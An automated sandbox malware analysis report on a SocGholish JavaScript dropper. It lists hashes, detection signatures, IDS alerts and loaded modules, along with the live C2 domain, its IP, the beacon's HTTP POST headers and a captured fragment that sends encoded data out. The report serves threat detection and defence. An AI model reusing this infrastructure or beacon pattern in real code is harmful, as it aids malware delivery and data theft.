Windows Analysis Report
Version.125.7599.75.js

Overview

General Information

Sample name: Version.125.7599.75.js
Analysis ID: 1431609
MD5: 0fed9ddc5b3dfd8b5db67a80ad322f3a
SHA1: 53c92820c6d2f60599967bc1ba72f76b7770401e
SHA256: a6985225afe814ab6dd06dc6113753757392f7546e336db9a76b4b6af6fb48b2
Infos:

Detection

SocGholish
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SocGholish
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://bxs.anesthetics.biomedzglobal.com/ Avira URL Cloud: Label: malware
Source: https://bxs.anesthetics.biomedzglobal.com/editContent9 Avira URL Cloud: Label: malware
Source: https://bxs.anesthetics.biomedzglobal.com/editContent Avira URL Cloud: Label: malware
Source: https://bxs.anesthetics.biomedzglobal.com/editContentG Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: https://bxs.anesthetics.biomedzglobal.com/editContent Virustotal: Detection: 5% Perma Link
Source: unknown HTTPS traffic detected: 45.59.170.27:443 -> 192.168.2.4:49730 version: TLS 1.2

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2052170 ET TROJAN SocGholish CnC Domain in DNS Lookup (* .anesthetics .biomedzglobal .com) 192.168.2.4:64157 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2052171 ET TROJAN SocGholish CnC Domain in TLS SNI (* .anesthetics .biomedzglobal .com) 192.168.2.4:49730 -> 45.59.170.27:443
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 45.59.170.27 443 Jump to behavior
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: MEDIACOM-ENTERPRISE-BUSINESSUS MEDIACOM-ENTERPRISE-BUSINESSUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /editContent HTTP/1.1Accept: */*Upgrade-Insecure-Requests: 1Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bxs.anesthetics.biomedzglobal.comContent-Length: 44Connection: Keep-AliveCache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: bxs.anesthetics.biomedzglobal.com
Source: unknown HTTP traffic detected: POST /editContent HTTP/1.1Accept: */*Upgrade-Insecure-Requests: 1Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bxs.anesthetics.biomedzglobal.comContent-Length: 44Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Apr 2024 12:24:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
Source: wscript.exe, 00000000.00000003.1736833114.000001A083AD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/
Source: wscript.exe, wscript.exe, 00000000.00000003.1701094960.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1736074113.000001A0859A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1737220941.000001A0839C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1737551980.000001A083AA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735718332.000001A083A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702236239.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702620077.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735880695.000001A083AA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1701334680.000001A085810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/editContent
Source: wscript.exe, 00000000.00000003.1701094960.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1737880248.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702236239.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1736534060.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702620077.000001A085B73000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/editContent9
Source: wscript.exe, 00000000.00000002.1737551980.000001A083AA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735718332.000001A083A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735880695.000001A083AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/editContentG
Source: wscript.exe, 00000000.00000002.1737551980.000001A083AA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735718332.000001A083A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735880695.000001A083AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/editContentg
Source: wscript.exe, 00000000.00000002.1737880248.000001A085B23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1736534060.000001A085B23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702427130.000001A085B23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1701705411.000001A085B23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown HTTPS traffic detected: 45.59.170.27:443 -> 192.168.2.4:49730 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected SocGholish
Source: Yara match File source: Version.125.7599.75.js, type: SAMPLE
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6732, type: MEMORYSTR

System Summary
barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} Jump to behavior
Java / VBScript file with very long strings (likely obfuscated code)
Source: Version.125.7599.75.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.troj.evad.winJS@1/0@1/1
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior

Data Obfuscation
barindex
JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: setRequestHeader("Upgrade-Insecure-Requests", "1");IServerXMLHTTPRequest2.send("tI//zLO+yCKDJY5Vnye1jc5pz1L3vJ3G5atMacSBjA==");<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: wscript.exe, 00000000.00000002.1737880248.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1737551980.000001A083AA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1701705411.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735718332.000001A083A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702427130.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1700913977.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1736534060.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735880695.000001A083AA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 45.59.170.27 443 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected SocGholish
Source: Yara match File source: Version.125.7599.75.js, type: SAMPLE
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6732, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected SocGholish
Source: Yara match File source: Version.125.7599.75.js, type: SAMPLE
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6732, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431609 Sample: Version.125.7599.75.js Startdate: 25/04/2024 Architecture: WINDOWS Score: 100 10 bxs.anesthetics.biomedzglobal.com 2->10 14 Snort IDS alert for network traffic 2->14 16 Multi AV Scanner detection for domain / URL 2->16 18 Antivirus detection for URL or domain 2->18 20 3 other signatures 2->20 6 wscript.exe 1 12 2->6         started        signatures3 process4 dnsIp5 12 bxs.anesthetics.biomedzglobal.com 45.59.170.27, 443, 49730 MEDIACOM-ENTERPRISE-BUSINESSUS Reserved 6->12 22 System process connects to network (likely due to code injection or exploit) 6->22 24 JScript performs obfuscated calls to suspicious functions 6->24 26 Windows Scripting host queries suspicious COM object (likely to drop second stage) 6->26 signatures6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.59.170.27
 bxs.anesthetics.biomedzglobal.com Reserved
30036 MEDIACOM-ENTERPRISE-BUSINESSUS true

Contacted Domains

Name IP Active
bxs.anesthetics.biomedzglobal.com 45.59.170.27 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://bxs.anesthetics.biomedzglobal.com/editContent true
  • 5%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown